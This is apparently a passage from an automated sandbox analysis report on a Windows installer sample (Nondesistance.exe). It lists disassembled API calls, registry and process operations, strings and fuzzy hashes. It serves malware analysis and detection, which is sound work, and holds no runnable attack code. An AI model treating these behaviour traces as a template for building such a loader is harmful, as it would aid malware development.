                                                                                                  • API String ID: 4283519449-3347255130

                                                                                                  Control-flow Graph, starting at block 401751-401774 (graph not reproduced; legend: Executed / Not Executed)
                                                                                                  APIs
                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\dewater\reinsmen,00000000,00000000,00000031), ref: 00401790
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\dewater\reinsmen,00000000,00000000,00000031), ref: 004017BA
                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Skuldertasken115 Setup,NSIS Error), ref: 00405D3C
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp$C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll$C:\Users\user\dewater\reinsmen$Call

                                                                                                  Control-flow Graph, starting at block 402e9f-402eb3 (graph not reproduced; legend: Executed / Not Executed)
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$wsprintf
                                                                                                  • String ID: DA$ DA$... %d%%$;]A

                                                                                                  Control-flow Graph, starting at block 404f48-404f5d (graph not reproduced; legend: Executed / Not Executed)
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                  • lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll

                                                                                                  Control-flow Graph, starting at block 40540e-405459 (graph not reproduced; legend: Executed / Not Executed)
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                  • GetLastError.KERNEL32 ref: 00405465
                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                  • GetLastError.KERNEL32 ref: 00405484
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@

                                                                                                  Control-flow Graph, starting at block 40605a-40607a (graph not reproduced; legend: Executed / Not Executed)
                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                                  • wsprintfA.USER32 ref: 004060AA
                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                  • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                  • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                  • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 911 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 918 4023b0-4023b8 911->918 919 4028cf-4028de 911->919 921 4023c8-4023cb 918->921 922 4023ba-4023c7 call 402a3a lstrlenA 918->922 924 4023db-4023de 921->924 925 4023cd-4023da call 402a1d 921->925 922->921 929 4023e0-4023ea call 402e9f 924->929 930 4023ef-402403 RegSetValueExA 924->930 925->924 929->930 933 402405 930->933 934 402408-4024de RegCloseKey 930->934 933->934 934->919 936 4026a6-4026ad 934->936 936->919
                                                                                                  APIs
                                                                                                  • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                  • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp
                                                                                                  • API String ID: 1356686001-2523970413
                                                                                                  • Opcode ID: bec7360159c54444a62ffc30349932fb56a3d9b0bfa04e93961a420dff7a5997
                                                                                                  • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                  • Opcode Fuzzy Hash: bec7360159c54444a62ffc30349932fb56a3d9b0bfa04e93961a420dff7a5997
                                                                                                  • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 937 4059d1-4059db 938 4059dc-405a07 GetTickCount GetTempFileNameA 937->938 939 405a16-405a18 938->939 940 405a09-405a0b 938->940 942 405a10-405a13 939->942 940->938 941 405a0d 940->941 941->942
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 004059E5
                                                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059FF
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 004059D1
                                                                                                  • nsa, xrefs: 004059DC
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-1893205338
                                                                                                  • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                  • Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
                                                                                                  • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                  • Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 943 402a7a-402aa3 RegOpenKeyExA 944 402aa5-402ab0 943->944 945 402b0e-402b12 943->945 946 402acb-402adb RegEnumKeyA 944->946 947 402ab2-402ab5 946->947 948 402add-402aef RegCloseKey call 4060c8 946->948 949 402b02-402b05 RegCloseKey 947->949 950 402ab7-402ac9 call 402a7a 947->950 956 402af1-402b00 948->956 957 402b15-402b1b 948->957 954 402b0b-402b0d 949->954 950->946 950->948 954->945 956->945 957->954 958 402b1d-402b2b RegDeleteKeyA 957->958 958->954 959 402b2d 958->959 959->945
                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1912718029-0
                                                                                                  • Opcode ID: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                                                  • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                  • Opcode Fuzzy Hash: d3726fd62f486be70a3594a3b8fbaf41a64e02cd9dbe9a8d3bb385f6c1247452
                                                                                                  • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                    • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                    • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                    • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                  • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                  • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                  • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                  • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                  APIs
                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Timeout
                                                                                                  • String ID: !
                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                  • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                  • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                                  • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                                  • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401FBB
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 2987980305-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                    • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\dewater\reinsmen,00000000,00000000,000000F0), ref: 00401634
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 00401629
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 1892508949-140973065
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 004054D3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  APIs
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                    • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                    • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 3521207402-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 167947723-0
                                                                                                  APIs
                                                                                                  • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\dewater\reinsmen,?), ref: 00401E30
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 00401E1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: ExecuteShell
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 587946157-140973065
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsn16C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3677997916-0
                                                                                                  • Opcode ID: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                  • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                  • Opcode Fuzzy Hash: 9cf958dc8020beb2586e3c6158c9201faa194e5bb54263b31fc6b527f116e62c
                                                                                                  • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                  APIs
                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                  • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                  • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                  • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                  APIs
                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,000000C1,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseDeleteOpenValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 849931509-0
                                                                                                  • Opcode ID: 3a801d9aa44324c06a66848a08f06de51ff1881c11b8b54fa6283b0d3d039f67
                                                                                                  • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                                  • Opcode Fuzzy Hash: 3a801d9aa44324c06a66848a08f06de51ff1881c11b8b54fa6283b0d3d039f67
                                                                                                  • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                                  APIs
                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1938659011-0
                                                                                                  • Opcode ID: 624745e1c2f25a16b10ea7285cceccfece8d7894aeb9d878da06ff78070054d8
                                                                                                  • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                                                  • Opcode Fuzzy Hash: 624745e1c2f25a16b10ea7285cceccfece8d7894aeb9d878da06ff78070054d8
                                                                                                  • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                                                  APIs
                                                                                                  • ShowWindow.USER32(00000000), ref: 00401579
                                                                                                  • ShowWindow.USER32(000103EA), ref: 0040158E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ShowWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1268545403-0
                                                                                                  • Opcode ID: 748cd7fe1685eb5367add993e96662fd24b39d6897b161640e6c14adf6400025
